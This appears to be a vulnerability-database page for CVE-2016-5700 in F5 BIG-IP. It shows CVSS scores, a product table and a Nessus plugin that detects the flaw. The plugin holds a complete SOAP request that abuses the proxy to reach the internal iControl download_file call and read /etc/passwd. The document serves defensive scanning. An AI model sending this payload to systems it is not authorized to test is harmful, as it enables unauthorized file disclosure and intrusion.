9.3 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.054 Low
EPSS
Percentile
93.2%
The BIG-IP virtual server running on the remote host is affected by a remote command execution vulnerability. This issue exists in servers that are configured to use the HTTP Explicit Proxy functionality and/or SOCKS profile. An unauthenticated, remote attacker can exploit this vulnerability to modify the BIG-IP system configuration, disclose sensitive system files, or possibly execute arbitrary commands.
Note that this plugin only deals with explicit proxy mode HTTP profiles and may not detect the vulnerability when only a SOCKS profile is assigned to the virtual server.
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(94408);
script_version("1.8");
script_cvs_date("Date: 2019/11/14");
script_cve_id("CVE-2016-5700");
script_bugtraq_id(93325);
script_name(english:"F5 Networks BIG-IP : BIG-IP Virtual Server HTTP Explicit Proxy / SOCKS Profile RCE (SOL35520031) (uncredentialed check)");
script_summary(english:"Attempts to retrieve a restrictive file.");
script_set_attribute(attribute:"synopsis", value:
"The remote device is missing a vendor-supplied security patch.");
script_set_attribute(attribute:"description", value:
"The BIG-IP virtual server running on the remote host is affected by a
remote command execution vulnerability. This issue exists in servers
that are configured to use the HTTP Explicit Proxy functionality
and/or SOCKS profile. An unauthenticated, remote attacker can exploit
this vulnerability to modify the BIG-IP system configuration, disclose
sensitive system files, or possibly execute arbitrary commands.
Note that this plugin only deals with explicit proxy mode HTTP
profiles and may not detect the vulnerability when only a SOCKS
profile is assigned to the virtual server.");
script_set_attribute(attribute:"see_also", value:"http://support.f5.com/kb/en-us/solutions/public/k/35/sol35520031.html");
script_set_attribute(attribute:"solution", value:
"Upgrade to one of the non-vulnerable versions listed in the F5
Solution SOL35520031.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2016-5700");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"false");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2016/09/28");
script_set_attribute(attribute:"patch_publication_date", value:"2016/09/28");
script_set_attribute(attribute:"plugin_publication_date", value:"2016/10/28");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_acceleration_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_access_policy_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_advanced_firewall_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_security_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_link_controller");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_local_traffic_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_policy_enforcement_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_websafe");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("http_version.nasl");
script_require_ports("Services/www", 80, 443);
exit(0);
}
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("dump.inc");
port = get_http_port(default:80);
file = "/etc/passwd";
url = "http://127.0.0.1/iControl/iControlPortal.cgi";
data = '<?xml version="1.0" encoding="UTF-8"?>
<soapenv:Envelope
xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<soapenv:Body>
<ns1:download_file
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:ns1="urn:iControl:System/ConfigSync">
<file_name xsi:type="xsd:string">' + file + '</file_name>
<chunk_size href="#id0"/>
<file_offset href="#id1"/>
</ns1:download_file>
<multiRef id="id1"
soapenc:root="0"
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xsi:type="xsd:long"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
0
</multiRef>
<multiRef id="id0"
soapenc:root="0"
soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xsi:type="xsd:long"
xmlns:soapenc="http://schemas.xmlsoap.org/soap/encoding/">
65536
</multiRef>
</soapenv:Body>
</soapenv:Envelope>';
res = http_send_recv3(
method : "POST",
item : url,
port : port,
data : data,
exit_on_fail : TRUE
);
req = http_last_sent_request();
# Vulnerable: we got some file content
if (res[0] =~ "^HTTP/[0-9]\.[0-9] 200" &&
(matches = eregmatch(string:res[2], pattern: "<file_data[\s\S]*>(.*)</file_data>"))
)
{
file_data = base64_decode(str: matches[1]);
if(file_data)
{
if(file_data =~ "^[\s\S]*root.*/bin/bash")
{
security_report_v4(
port : port,
severity : SECURITY_HOLE,
file : file,
output : file_data,
request : make_list(req)
);
}
else
{
exit(1, 'Decoded file data does not appear to be ' + file + ': \n' + hexdump(ddata: file_data));
}
}
else
{
exit(1, 'Failed to base64-decode file content. HTTP response: \n' + hexdump(ddata: res[2]));
}
}
else
{
exit(0, 'The remote host is not a BIG-IP system or Nessus cannot determine whether the remote host is vulnerable.');
}
Vendor | Product | Version | CPE |
---|---|---|---|
f5 | big-ip_application_acceleration_manager | cpe:/a:f5:big-ip_application_acceleration_manager | |
f5 | big-ip_access_policy_manager | cpe:/a:f5:big-ip_access_policy_manager | |
f5 | big-ip_advanced_firewall_manager | cpe:/a:f5:big-ip_advanced_firewall_manager | |
f5 | big-ip_application_security_manager | cpe:/a:f5:big-ip_application_security_manager | |
f5 | big-ip_link_controller | cpe:/a:f5:big-ip_link_controller | |
f5 | big-ip_local_traffic_manager | cpe:/a:f5:big-ip_local_traffic_manager | |
f5 | big-ip_policy_enforcement_manager | cpe:/a:f5:big-ip_policy_enforcement_manager | |
f5 | big-ip_websafe | cpe:/a:f5:big-ip_websafe |
9.3 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:M/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.054 Low
EPSS
Percentile
93.2%